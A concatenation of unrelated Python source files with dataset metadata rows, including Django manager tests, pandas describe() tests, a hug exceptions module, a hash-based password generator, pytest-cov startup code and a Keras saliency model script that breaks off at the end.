for attr in mandatory_attrs:
self.assertTrue(hasattr(mm, attr))
def test_all_returns_user_objects_no_matter_the_active_context(self):
collection1 = modelfactories.CollectionFactory.create()
collection2 = modelfactories.CollectionFactory.create()
user = self._make_user(collection1, collection2)
collection2.make_default_to_user(user)
sponsor1 = modelfactories.SponsorFactory.create()
sponsor1.collections.add(collection1)
sponsor2 = modelfactories.SponsorFactory.create()
sponsor2.collections.add(collection2)
def get_user_collections():
return user.user_collection.all()
user_sponsors = models.Sponsor.userobjects.all(
get_all_collections=get_user_collections)
self.assertEqual(user_sponsors.count(), 2)
self.assertIn(sponsor1, user_sponsors)
self.assertIn(sponsor2, user_sponsors)
def test_active_returns_user_objects_bound_to_the_active_context(self):
collection1 = modelfactories.CollectionFactory.create()
collection2 = modelfactories.CollectionFactory.create()
user = self._make_user(collection1, collection2)
collection2.make_default_to_user(user)
sponsor1 = modelfactories.SponsorFactory.create()
sponsor1.collections.add(collection1)
sponsor2 = modelfactories.SponsorFactory.create()
sponsor2.collections.add(collection2)
def get_active_collection():
return user.user_collection.get(usercollections__is_default=True)
user_sponsors = models.Sponsor.userobjects.active(
get_active_collection=get_active_collection)
self.assertEqual(user_sponsors.count(), 1)
self.assertIn(sponsor2, user_sponsors)
def test_startswith_is_based_on_name_attr(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
sponsor1 = modelfactories.SponsorFactory.create(
name=u'FOO')
sponsor1.collections.add(collection)
sponsor2 = modelfactories.SponsorFactory.create(
name=u'BAR')
sponsor2.collections.add(collection)
def get_user_collections():
return user.user_collection.all()
user_sponsors = models.Sponsor.userobjects.all(
get_all_collections=get_user_collections).startswith('F')
self.assertEqual(user_sponsors.count(), 1)
self.assertIn(sponsor1, user_sponsors)
def test_startswith_is_case_insensitive(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
sponsor1 = modelfactories.SponsorFactory.create(
name=u'FOO')
sponsor1.collections.add(collection)
sponsor2 = modelfactories.SponsorFactory.create(
name=u'BAR')
sponsor2.collections.add(collection)
def get_user_collections():
return user.user_collection.all()
upper_cased = models.Sponsor.userobjects.all(
get_all_collections=get_user_collections).startswith('F')
lower_cased = models.Sponsor.userobjects.all(
get_all_collections=get_user_collections).startswith('f')
self.assertEqual(
[j.pk for j in upper_cased],
[j.pk for j in lower_cased]
)
def test_startswith_returns_empty_if_there_are_not_matches(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
sponsor1 = modelfactories.SponsorFactory.create(
name=u'FOO')
sponsor1.collections.add(collection)
def get_user_collections():
return user.user_collection.all()
user_sponsors = models.Sponsor.userobjects.all(
get_all_collections=get_user_collections).startswith('ZAP')
self.assertEqual(user_sponsors.count(), 0)
def test_startswith_coerces_term_to_unicode(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
sponsor1 = modelfactories.SponsorFactory.create(
name=u'FOO')
sponsor1.collections.add(collection)
sponsor2 = modelfactories.SponsorFactory.create(
name=u'7 BAR')
sponsor2.collections.add(collection)
def get_user_collections():
return user.user_collection.all()
user_sponsors = models.Sponsor.userobjects.all(
get_all_collections=get_user_collections).startswith(7)
self.assertEqual(user_sponsors.count(), 1)
self.assertIn(sponsor2, user_sponsors)
def test_simple_search_is_based_on_name_attr(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
sponsor1 = modelfactories.SponsorFactory.create(
name=u'FOO')
sponsor1.collections.add(collection)
sponsor2 = modelfactories.SponsorFactory.create(
name=u'BAR')
sponsor2.collections.add(collection)
def get_user_collections():
return user.user_collection.all()
user_sponsors = models.Sponsor.userobjects.all(
get_all_collections=get_user_collections).simple_search('FOO')
self.assertEqual(user_sponsors.count(), 1)
self.assertIn(sponsor1, user_sponsors)
def test_simple_search_is_case_insensitive(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
sponsor1 = modelfactories.SponsorFactory.create(
name=u'FOO')
sponsor1.collections.add(collection)
sponsor2 = modelfactories.SponsorFactory.create(
name=u'BAR')
sponsor2.collections.add(collection)
def get_user_collections():
return user.user_collection.all()
upper_cased = models.Sponsor.userobjects.all(
get_all_collections=get_user_collections).simple_search('FOO')
lower_cased = models.Sponsor.userobjects.all(
get_all_collections=get_user_collections).simple_search('foo')
self.assertEqual(
[j.pk for j in upper_cased],
[j.pk for j in lower_cased]
)
def test_simple_search_returns_empty_if_there_are_not_matches(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
sponsor1 = modelfactories.SponsorFactory.create(
name=u'FOO')
sponsor1.collections.add(collection)
def get_user_collections():
return user.user_collection.all()
user_sponsors = models.Sponsor.userobjects.all(
get_all_collections=get_user_collections).simple_search('ZAP')
self.assertEqual(user_sponsors.count(), 0)
def test_simple_search_coerces_term_to_unicode(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
sponsor1 = modelfactories.SponsorFactory.create(
name=u'FOO')
sponsor1.collections.add(collection)
sponsor2 = modelfactories.SponsorFactory.create(
name=u'7 BAR')
sponsor2.collections.add(collection)
def get_user_collections():
return user.user_collection.all()
user_sponsors = models.Sponsor.userobjects.all(
get_all_collections=get_user_collections).simple_search(7)
self.assertEqual(user_sponsors.count(), 1)
self.assertIn(sponsor2, user_sponsors)
def test_available_returns_non_trashed_items(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
sponsor1 = modelfactories.SponsorFactory.create(
name=u'FOO', is_trashed=False)
sponsor1.collections.add(collection)
def get_user_collections():
return user.user_collection.all()
user_sponsors = models.Sponsor.userobjects.all(
get_all_collections=get_user_collections).available()
self.assertEqual(user_sponsors.count(), 1)
self.assertIn(sponsor1, user_sponsors)
def test_available_ignores_trashed_items(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
sponsor1 = modelfactories.SponsorFactory.create(
name=u'FOO', is_trashed=True)
sponsor1.collections.add(collection)
def get_user_collections():
return user.user_collection.all()
user_sponsors = models.Sponsor.userobjects.all(
get_all_collections=get_user_collections).available()
self.assertEqual(user_sponsors.count(), 0)
def test_unavailable_returns_trashed_items(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
sponsor1 = modelfactories.SponsorFactory.create(
name=u'FOO', is_trashed=True)
sponsor1.collections.add(collection)
def get_user_collections():
return user.user_collection.all()
user_sponsors = models.Sponsor.userobjects.all(
get_all_collections=get_user_collections).unavailable()
self.assertEqual(user_sponsors.count(), 1)
def test_unavailable_ignores_non_trashed_items(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
sponsor1 = modelfactories.SponsorFactory.create(
name=u'FOO', is_trashed=False)
sponsor1.collections.add(collection)
def get_user_collections():
return user.user_collection.all()
user_sponsors = models.Sponsor.userobjects.all(
get_all_collections=get_user_collections).unavailable()
self.assertEqual(user_sponsors.count(), 0)
class RegularPressReleaseManagerTests(TestCase):
def _make_user(self, *collection):
user = auth.UserF(is_active=True)
for coll in collection:
coll.add_user(user, is_manager=True)
return user
def test_manager_base_interface(self):
mandatory_attrs = ['all', 'active']
for attr in mandatory_attrs:
self.assertTrue(hasattr(models.RegularPressRelease.userobjects, attr))
def test_queryset_base_interface(self):
mandatory_attrs = ['all', 'active', 'available', 'unavailable']
mm = modelmanagers.RegularPressReleaseQuerySet()
for attr in mandatory_attrs:
self.assertTrue(hasattr(mm, attr))
def test_all_returns_user_objects_no_matter_the_active_context(self):
collection1 = modelfactories.CollectionFactory.create()
collection2 = modelfactories.CollectionFactory.create()
user = self._make_user(collection1, collection2)
collection2.make_default_to_user(user)
journal = modelfactories.JournalFactory.create(collection=collection1)
journal2 = modelfactories.JournalFactory.create(collection=collection2)
issue = modelfactories.IssueFactory.create(journal=journal)
issue2 = modelfactories.IssueFactory.create(journal=journal2)
pr = modelfactories.RegularPressReleaseFactory.create(issue=issue)
pr2 = modelfactories.RegularPressReleaseFactory.create(issue=issue2)
def get_user_collections():
return user.user_collection.all()
user_prs = models.RegularPressRelease.userobjects.all(
get_all_collections=get_user_collections)
self.assertEqual(user_prs.count(), 2)
self.assertIn(pr, user_prs)
self.assertIn(pr2, user_prs)
def test_active_returns_user_objects_bound_to_the_active_context(self):
collection1 = modelfactories.CollectionFactory.create()
collection2 = modelfactories.CollectionFactory.create()
user = self._make_user(collection1, collection2)
collection2.make_default_to_user(user)
journal = modelfactories.JournalFactory.create(collection=collection1)
journal2 = modelfactories.JournalFactory.create(collection=collection2)
issue = modelfactories.IssueFactory.create(journal=journal)
issue2 = modelfactories.IssueFactory.create(journal=journal2)
pr = modelfactories.RegularPressReleaseFactory.create(issue=issue)
pr2 = modelfactories.RegularPressReleaseFactory.create(issue=issue2)
def get_active_collection():
return user.user_collection.get(usercollections__is_default=True)
user_prs = models.RegularPressRelease.userobjects.active(
get_active_collection=get_active_collection)
self.assertEqual(user_prs.count(), 1)
self.assertIn(pr2, user_prs)
def test_journal_accepts_journal_objects(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
collection.make_default_to_user(user)
journal = modelfactories.JournalFactory.create(collection=collection)
issue = modelfactories.IssueFactory.create(journal=journal)
pr = modelfactories.RegularPressReleaseFactory.create(issue=issue)
def get_active_collection():
return user.user_collection.get(usercollections__is_default=True)
user_prs = models.RegularPressRelease.userobjects.active(
get_active_collection=get_active_collection).journal(journal)
self.assertEqual(user_prs.count(), 1)
self.assertIn(pr, user_prs)
def test_journal_accepts_journal_pk(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
collection.make_default_to_user(user)
journal = modelfactories.JournalFactory.create(collection=collection)
issue = modelfactories.IssueFactory.create(journal=journal)
pr = modelfactories.RegularPressReleaseFactory.create(issue=issue)
def get_active_collection():
return user.user_collection.get(usercollections__is_default=True)
user_prs = models.RegularPressRelease.userobjects.active(
get_active_collection=get_active_collection).journal(journal.pk)
self.assertEqual(user_prs.count(), 1)
self.assertIn(pr, user_prs)
class AheadPressReleaseManagerTests(TestCase):
def _make_user(self, *collection):
user = auth.UserF(is_active=True)
for coll in collection:
coll.add_user(user, is_manager=True)
return user
def test_manager_base_interface(self):
mandatory_attrs = ['all', 'active']
for attr in mandatory_attrs:
self.assertTrue(hasattr(models.AheadPressRelease.userobjects, attr))
def test_queryset_base_interface(self):
mandatory_attrs = ['all', 'active', 'available', 'unavailable']
mm = modelmanagers.AheadPressReleaseQuerySet()
for attr in mandatory_attrs:
self.assertTrue(hasattr(mm, attr))
def test_all_returns_user_objects_no_matter_the_active_context(self):
collection1 = modelfactories.CollectionFactory.create()
collection2 = modelfactories.CollectionFactory.create()
user = self._make_user(collection1, collection2)
collection2.make_default_to_user(user)
journal = modelfactories.JournalFactory.create(collection=collection1)
journal2 = modelfactories.JournalFactory.create(collection=collection2)
pr = modelfactories.AheadPressReleaseFactory.create(journal=journal)
pr2 = modelfactories.AheadPressReleaseFactory.create(journal=journal2)
def get_user_collections():
return user.user_collection.all()
user_prs = models.AheadPressRelease.userobjects.all(
get_all_collections=get_user_collections)
self.assertEqual(user_prs.count(), 2)
self.assertIn(pr, user_prs)
self.assertIn(pr2, user_prs)
def test_active_returns_user_objects_bound_to_the_active_context(self):
collection1 = modelfactories.CollectionFactory.create()
collection2 = modelfactories.CollectionFactory.create()
user = self._make_user(collection1, collection2)
collection2.make_default_to_user(user)
journal = modelfactories.JournalFactory.create(collection=collection1)
journal2 = modelfactories.JournalFactory.create(collection=collection2)
pr = modelfactories.AheadPressReleaseFactory.create(journal=journal)
pr2 = modelfactories.AheadPressReleaseFactory.create(journal=journal2)
def get_active_collection():
return user.user_collection.get(usercollections__is_default=True)
user_prs = models.AheadPressRelease.userobjects.active(
get_active_collection=get_active_collection)
self.assertEqual(user_prs.count(), 1)
self.assertIn(pr2, user_prs)
def test_journal_accepts_journal_objects(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
collection.make_default_to_user(user)
journal = modelfactories.JournalFactory.create(collection=collection)
pr = modelfactories.AheadPressReleaseFactory.create(journal=journal)
def get_active_collection():
return user.user_collection.get(usercollections__is_default=True)
user_prs = models.AheadPressRelease.userobjects.active(
get_active_collection=get_active_collection).journal(journal)
self.assertEqual(user_prs.count(), 1)
self.assertIn(pr, user_prs)
def test_journal_accepts_journal_pk(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
collection.make_default_to_user(user)
journal = modelfactories.JournalFactory.create(collection=collection)
pr = modelfactories.AheadPressReleaseFactory.create(journal=journal)
def get_active_collection():
return user.user_collection.get(usercollections__is_default=True)
user_prs = models.AheadPressRelease.userobjects.active(
get_active_collection=get_active_collection).journal(journal.pk)
self.assertEqual(user_prs.count(), 1)
self.assertIn(pr, user_prs)
| bsd-2-clause | -2,289,931,664,152,842,800 | 33.862802 | 82 | 0.671092 | false |
jreback/pandas | pandas/tests/frame/methods/test_describe.py | 1 | 12434 | import numpy as np
import pandas as pd
from pandas import Categorical, DataFrame, Series, Timestamp, date_range
import pandas._testing as tm
class TestDataFrameDescribe:
def test_describe_bool_in_mixed_frame(self):
df = DataFrame(
{
"string_data": ["a", "b", "c", "d", "e"],
"bool_data": [True, True, False, False, False],
"int_data": [10, 20, 30, 40, 50],
}
)
# Integer data are included in .describe() output,
# Boolean and string data are not.
result = df.describe()
expected = DataFrame(
{"int_data": [5, 30, df.int_data.std(), 10, 20, 30, 40, 50]},
index=["count", "mean", "std", "min", "25%", "50%", "75%", "max"],
)
tm.assert_frame_equal(result, expected)
# Top value is a boolean value that is False
result = df.describe(include=["bool"])
expected = DataFrame(
{"bool_data": [5, 2, False, 3]}, index=["count", "unique", "top", "freq"]
)
tm.assert_frame_equal(result, expected)
def test_describe_empty_object(self):
# GH#27183
df = DataFrame({"A": [None, None]}, dtype=object)
result = df.describe()
expected = DataFrame(
{"A": [0, 0, np.nan, np.nan]},
dtype=object,
index=["count", "unique", "top", "freq"],
)
tm.assert_frame_equal(result, expected)
result = df.iloc[:0].describe()
tm.assert_frame_equal(result, expected)
def test_describe_bool_frame(self):
# GH#13891
df = DataFrame(
{
"bool_data_1": [False, False, True, True],
"bool_data_2": [False, True, True, True],
}
)
result = df.describe()
expected = DataFrame(
{"bool_data_1": [4, 2, False, 2], "bool_data_2": [4, 2, True, 3]},
index=["count", "unique", "top", "freq"],
)
tm.assert_frame_equal(result, expected)
df = DataFrame(
{
"bool_data": [False, False, True, True, False],
"int_data": [0, 1, 2, 3, 4],
}
)
result = df.describe()
expected = DataFrame(
{"int_data": [5, 2, df.int_data.std(), 0, 1, 2, 3, 4]},
index=["count", "mean", "std", "min", "25%", "50%", "75%", "max"],
)
tm.assert_frame_equal(result, expected)
df = DataFrame(
{"bool_data": [False, False, True, True], "str_data": ["a", "b", "c", "a"]}
)
result = df.describe()
expected = DataFrame(
{"bool_data": [4, 2, False, 2], "str_data": [4, 3, "a", 2]},
index=["count", "unique", "top", "freq"],
)
tm.assert_frame_equal(result, expected)
def test_describe_categorical(self):
df = DataFrame({"value": np.random.randint(0, 10000, 100)})
labels = [f"{i} - {i + 499}" for i in range(0, 10000, 500)]
cat_labels = Categorical(labels, labels)
df = df.sort_values(by=["value"], ascending=True)
df["value_group"] = pd.cut(
df.value, range(0, 10500, 500), right=False, labels=cat_labels
)
cat = df
# Categoricals should not show up together with numerical columns
result = cat.describe()
assert len(result.columns) == 1
# In a frame, describe() for the cat should be the same as for string
# arrays (count, unique, top, freq)
cat = Categorical(
["a", "b", "b", "b"], categories=["a", "b", "c"], ordered=True
)
s = Series(cat)
result = s.describe()
expected = Series([4, 2, "b", 3], index=["count", "unique", "top", "freq"])
tm.assert_series_equal(result, expected)
cat = Series(Categorical(["a", "b", "c", "c"]))
df3 = DataFrame({"cat": cat, "s": ["a", "b", "c", "c"]})
result = df3.describe()
tm.assert_numpy_array_equal(result["cat"].values, result["s"].values)
def test_describe_empty_categorical_column(self):
# GH#26397
# Ensure the index of an empty categorical DataFrame column
# also contains (count, unique, top, freq)
df = DataFrame({"empty_col": Categorical([])})
result = df.describe()
expected = DataFrame(
{"empty_col": [0, 0, np.nan, np.nan]},
index=["count", "unique", "top", "freq"],
dtype="object",
)
tm.assert_frame_equal(result, expected)
# ensure NaN, not None
assert np.isnan(result.iloc[2, 0])
assert np.isnan(result.iloc[3, 0])
def test_describe_categorical_columns(self):
# GH#11558
columns = pd.CategoricalIndex(["int1", "int2", "obj"], ordered=True, name="XXX")
df = DataFrame(
{
"int1": [10, 20, 30, 40, 50],
"int2": [10, 20, 30, 40, 50],
"obj": ["A", 0, None, "X", 1],
},
columns=columns,
)
result = df.describe()
exp_columns = pd.CategoricalIndex(
["int1", "int2"],
categories=["int1", "int2", "obj"],
ordered=True,
name="XXX",
)
expected = DataFrame(
{
"int1": [5, 30, df.int1.std(), 10, 20, 30, 40, 50],
"int2": [5, 30, df.int2.std(), 10, 20, 30, 40, 50],
},
index=["count", "mean", "std", "min", "25%", "50%", "75%", "max"],
columns=exp_columns,
)
tm.assert_frame_equal(result, expected)
tm.assert_categorical_equal(result.columns.values, expected.columns.values)
def test_describe_datetime_columns(self):
columns = pd.DatetimeIndex(
["2011-01-01", "2011-02-01", "2011-03-01"],
freq="MS",
tz="US/Eastern",
name="XXX",
)
df = DataFrame(
{
0: [10, 20, 30, 40, 50],
1: [10, 20, 30, 40, 50],
2: ["A", 0, None, "X", 1],
}
)
df.columns = columns
result = df.describe()
exp_columns = pd.DatetimeIndex(
["2011-01-01", "2011-02-01"], freq="MS", tz="US/Eastern", name="XXX"
)
expected = DataFrame(
{
0: [5, 30, df.iloc[:, 0].std(), 10, 20, 30, 40, 50],
1: [5, 30, df.iloc[:, 1].std(), 10, 20, 30, 40, 50],
},
index=["count", "mean", "std", "min", "25%", "50%", "75%", "max"],
)
expected.columns = exp_columns
tm.assert_frame_equal(result, expected)
assert result.columns.freq == "MS"
assert result.columns.tz == expected.columns.tz
def test_describe_timedelta_values(self):
# GH#6145
t1 = pd.timedelta_range("1 days", freq="D", periods=5)
t2 = pd.timedelta_range("1 hours", freq="H", periods=5)
df = DataFrame({"t1": t1, "t2": t2})
expected = DataFrame(
{
"t1": [
5,
pd.Timedelta("3 days"),
df.iloc[:, 0].std(),
pd.Timedelta("1 days"),
pd.Timedelta("2 days"),
pd.Timedelta("3 days"),
pd.Timedelta("4 days"),
pd.Timedelta("5 days"),
],
"t2": [
5,
pd.Timedelta("3 hours"),
df.iloc[:, 1].std(),
pd.Timedelta("1 hours"),
pd.Timedelta("2 hours"),
pd.Timedelta("3 hours"),
pd.Timedelta("4 hours"),
pd.Timedelta("5 hours"),
],
},
index=["count", "mean", "std", "min", "25%", "50%", "75%", "max"],
)
result = df.describe()
tm.assert_frame_equal(result, expected)
exp_repr = (
" t1 t2\n"
"count 5 5\n"
"mean 3 days 00:00:00 0 days 03:00:00\n"
"std 1 days 13:56:50.394919273 0 days 01:34:52.099788303\n"
"min 1 days 00:00:00 0 days 01:00:00\n"
"25% 2 days 00:00:00 0 days 02:00:00\n"
"50% 3 days 00:00:00 0 days 03:00:00\n"
"75% 4 days 00:00:00 0 days 04:00:00\n"
"max 5 days 00:00:00 0 days 05:00:00"
)
assert repr(result) == exp_repr
def test_describe_tz_values(self, tz_naive_fixture):
# GH#21332
tz = tz_naive_fixture
s1 = Series(range(5))
start = Timestamp(2018, 1, 1)
end = Timestamp(2018, 1, 5)
s2 = Series(date_range(start, end, tz=tz))
df = DataFrame({"s1": s1, "s2": s2})
expected = DataFrame(
{
"s1": [5, 2, 0, 1, 2, 3, 4, 1.581139],
"s2": [
5,
Timestamp(2018, 1, 3).tz_localize(tz),
start.tz_localize(tz),
s2[1],
s2[2],
s2[3],
end.tz_localize(tz),
np.nan,
],
},
index=["count", "mean", "min", "25%", "50%", "75%", "max", "std"],
)
result = df.describe(include="all", datetime_is_numeric=True)
tm.assert_frame_equal(result, expected)
def test_datetime_is_numeric_includes_datetime(self):
df = DataFrame({"a": pd.date_range("2012", periods=3), "b": [1, 2, 3]})
result = df.describe(datetime_is_numeric=True)
expected = DataFrame(
{
"a": [
3,
Timestamp("2012-01-02"),
Timestamp("2012-01-01"),
Timestamp("2012-01-01T12:00:00"),
Timestamp("2012-01-02"),
Timestamp("2012-01-02T12:00:00"),
Timestamp("2012-01-03"),
np.nan,
],
"b": [3, 2, 1, 1.5, 2, 2.5, 3, 1],
},
index=["count", "mean", "min", "25%", "50%", "75%", "max", "std"],
)
tm.assert_frame_equal(result, expected)
def test_describe_tz_values2(self):
tz = "CET"
s1 = Series(range(5))
start = Timestamp(2018, 1, 1)
end = Timestamp(2018, 1, 5)
s2 = Series(date_range(start, end, tz=tz))
df = DataFrame({"s1": s1, "s2": s2})
s1_ = s1.describe()
s2_ = Series(
[
5,
5,
s2.value_counts().index[0],
1,
start.tz_localize(tz),
end.tz_localize(tz),
],
index=["count", "unique", "top", "freq", "first", "last"],
)
idx = [
"count",
"unique",
"top",
"freq",
"first",
"last",
"mean",
"std",
"min",
"25%",
"50%",
"75%",
"max",
]
expected = pd.concat([s1_, s2_], axis=1, keys=["s1", "s2"]).loc[idx]
with tm.assert_produces_warning(FutureWarning):
result = df.describe(include="all")
tm.assert_frame_equal(result, expected)
def test_describe_percentiles_integer_idx(self):
# GH#26660
df = DataFrame({"x": [1]})
pct = np.linspace(0, 1, 10 + 1)
result = df.describe(percentiles=pct)
expected = DataFrame(
{"x": [1.0, 1.0, np.NaN, 1.0, *[1.0 for _ in pct], 1.0]},
index=[
"count",
"mean",
"std",
"min",
"0%",
"10%",
"20%",
"30%",
"40%",
"50%",
"60%",
"70%",
"80%",
"90%",
"100%",
"max",
],
)
tm.assert_frame_equal(result, expected)
| bsd-3-clause | 5,314,292,373,838,665,000 | 33.348066 | 88 | 0.430835 | false |
MuhammadAlkarouri/hug | hug/exceptions.py | 1 | 1675 | """hug/exceptions.py
Defines the custom exceptions that are part of, and support
Copyright (C) 2016 Timothy Edmund Crosley
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and
to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or
substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED
TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF
CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
"""
from __future__ import absolute_import
class InvalidTypeData(Exception):
"""Should be raised when data passed in doesn't match a types expectations"""
def __init__(self, message, reasons=None):
self.message = message
self.reasons = reasons
class StoreKeyNotFound(Exception):
"""Should be raised when a store key has not been found inside a store"""
class SessionNotFound(StoreKeyNotFound):
"""Should be raised when a session ID has not been found inside a session store"""
pass
| mit | -3,855,715,342,116,879,400 | 43.078947 | 112 | 0.77194 | false |
odedlaz/python-password-chameleon | run.py | 1 | 2465 | #!/bin/python
from __future__ import print_function
from binascii import hexlify
import hashlib
import base64
from getpass import getpass
import sys
import argparse
charset = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
chameleon_charset = "ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz123456789?!#@&$="
numbers = "123456789"
letters = "ABCDEFGHIJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
punct = "?!#@&$"
def hashify(item):
m = hashlib.sha1()
m.update(item)
return m.digest()
def generate(secretpassword, sitename):
chained = "{0}:{1}".format(secretpassword,sitename.lower())
secret_hash = hashify(chained)
base64_secret = base64.b64encode(secret_hash)[:10]
encoded_secret = change_encoding(base64_secret)
pwd = ensurenumberandletter(encoded_secret)
return pwd
def change_encoding(s):
encoded = ""
for character in s:
index = charset.index(character)
encoded = encoded + chameleon_charset[index]
return encoded
def ensurenumberandletter(s):
hasnumber = False
hasletter = False
haspunct = False
for character in s:
if character in numbers:
hasnumber = True
if character in letters:
hasletter = True
if character in punct:
haspunct = True
if not hasnumber:
s = "1" + s[1:]
if not hasletter:
s = s[:1] + "a" + s[2:]
if not haspunct:
s = s[:2] + "@" + s[3:]
return s
def copy_passwd_to_clipboard(passwd):
try:
import pyperclip
pyperclip.copy(passwd)
except ImportError:
print("cannot copy to clipboard because the pyperclip package is not installed.")
def main(args):
print("generating password for site: {0}".format(args.sitename))
master_passwd = getpass("enter the master password: ")
generated_passwd = generate(master_passwd, args.sitename)
print("generated password: {}".format(generated_passwd))
if args.copy:
copy_passwd_to_clipboard(generated_passwd)
if __name__ == "__main__":
try:
parser = argparse.ArgumentParser()
parser.add_argument("-n","--sitename", help="the sitename to generated password to", type=str, required=True)
parser.add_argument("-c","--copy", help="copy to clipboard", action="store_true", default=False)
args = parser.parse_args()
main(args)
except KeyboardInterrupt:
print("\nbye!")
pass | mit | -7,371,451,792,089,840,000 | 29.444444 | 117 | 0.658418 | false |
opoplawski/pytest-cov | src/pytest_cov/embed.py | 1 | 1885 | """Activate coverage at python startup if appropriate.
The python site initialisation will ensure that anything we import
will be removed and not visible at the end of python startup. However
we minimise all work by putting these init actions in this separate
module and only importing what is needed when needed.
For normal python startup when coverage should not be activated the pth
file checks a single env var and does not import or call the init fn
here.
For python startup when an ancestor process has set the env indicating
that code coverage is being collected we activate coverage based on
info passed via env vars.
"""
import os
def multiprocessing_start(obj):
cov = init()
if cov:
multiprocessing.util.Finalize(None, multiprocessing_finish, args=(cov,), exitpriority=1000)
def multiprocessing_finish(cov):
cov.stop()
cov.save()
try:
import multiprocessing.util
except ImportError:
pass
else:
multiprocessing.util.register_after_fork(multiprocessing_start, multiprocessing_start)
def init():
# Only continue if ancestor process has set everything needed in
# the env.
cov_source = os.environ.get('COV_CORE_SOURCE')
cov_config = os.environ.get('COV_CORE_CONFIG')
if cov_config:
# Import what we need to activate coverage.
import coverage
# Determine all source roots.
if not cov_source:
cov_source = None
else:
cov_source = cov_source.split(os.pathsep)
# Activate coverage for this process.
cov = coverage.coverage(source=cov_source,
data_suffix=True,
config_file=cov_config,
auto_data=True)
cov.load()
cov.start()
cov._warn_no_data = False
cov._warn_unimported_source = False
return cov
| mit | 5,013,430,591,248,774,000 | 28.920635 | 99 | 0.668435 | false |
cvpr17-id899/saliency | main.py | 1 | 3662 | from __future__ import division
from keras.optimizers import RMSprop
from keras.callbacks import EarlyStopping, ModelCheckpoint, LearningRateScheduler
from keras.layers import Input
from keras.models import Model
import os, cv2, sys
import numpy as np
from config import *
from utilities import preprocess_images, preprocess_maps, postprocess_predictions
from model import sam, kl_divergence, schedule
def generator(b_s, phase_gen='train'):
if phase_gen == 'train':
images = [imgs_train_path + f for f in os.listdir(imgs_train_path) if f.endswith(('.jpg', '.jpeg', '.png'))]
maps = [maps_train_path + f for f in os.listdir(maps_train_path) if f.endswith(('.jpg', '.jpeg', '.png'))]
elif phase_gen == 'val':
images = [imgs_val_path + f for f in os.listdir(imgs_val_path) if f.endswith(('.jpg', '.jpeg', '.png'))]
maps = [maps_val_path + f for f in os.listdir(maps_val_path) if f.endswith(('.jpg', '.jpeg', '.png'))]
else:
raise NotImplementedError
images.sort()
maps.sort()
gaussian = np.zeros((b_s, nb_gaussian, shape_r_gt, shape_c_gt))
counter = 0
while True:
yield [preprocess_images(images[counter:counter+b_s], shape_r, shape_c), gaussian], preprocess_maps(maps[counter:counter+b_s], shape_r_gt, shape_c_gt)
counter = (counter + b_s) % len(images)
def generator_test(b_s, imgs_test_path):
images = [imgs_test_path + f for f in os.listdir(imgs_test_path) if f.endswith(('.jpg', '.jpeg', '.png'))]
images.sort()
gaussian = np.zeros((b_s, nb_gaussian, shape_r_gt, shape_c_gt))
counter = 0
while True:
yield [preprocess_images(images[counter:counter + b_s], shape_r, shape_c), gaussian]
counter = (counter + b_s) % len(images)
if __name__ == '__main__':
phase = sys.argv[1]
x = Input((3, shape_r, shape_c))
x_maps = Input((nb_gaussian, shape_r_gt, shape_c_gt))
m = Model(input=[x, x_maps], output=sam([x, x_maps]))
print("Compiling SAM")
m.compile(RMSprop(lr=1e-4, rho=0.9, epsilon=1e-08, decay=0.0), kl_divergence)
if phase == 'train':
print("Training SAM")
m.fit_generator(generator(b_s=b_s), nb_imgs_train, nb_epoch=nb_epoch,
validation_data=generator(b_s=b_s, phase_gen='val'), nb_val_samples=nb_imgs_val,
callbacks=[EarlyStopping(patience=5),
ModelCheckpoint('weights.sam.{epoch:02d}-{val_loss:.4f}.pkl', save_best_only=True),
LearningRateScheduler(schedule=schedule)])
elif phase == "test":
# path of output folder
output_folder = ''
if len(sys.argv) < 2:
raise SyntaxError
imgs_test_path = sys.argv[2]
file_names = [f for f in os.listdir(imgs_test_path) if f.endswith(('.jpg', '.jpeg', '.png'))]
file_names.sort()
nb_imgs_test = len(file_names)
print("Loading SAM weights")
m.load_weights('sam_salicon_weights.pkl')
print("Predicting saliency maps for " + imgs_test_path)
predictions = m.predict_generator(generator_test(b_s=b_s, imgs_test_path=imgs_test_path), nb_imgs_test)
for pred, name in zip(predictions, file_names):
original_image = cv2.imread(imgs_test_path + name, 0)
res = postprocess_predictions(pred[0], original_image.shape[0], original_image.shape[1])
name = name.split('.')[0]
cv2.imwrite(output_folder + '%s_sam.jpg' % name, res.astype(int))
else:
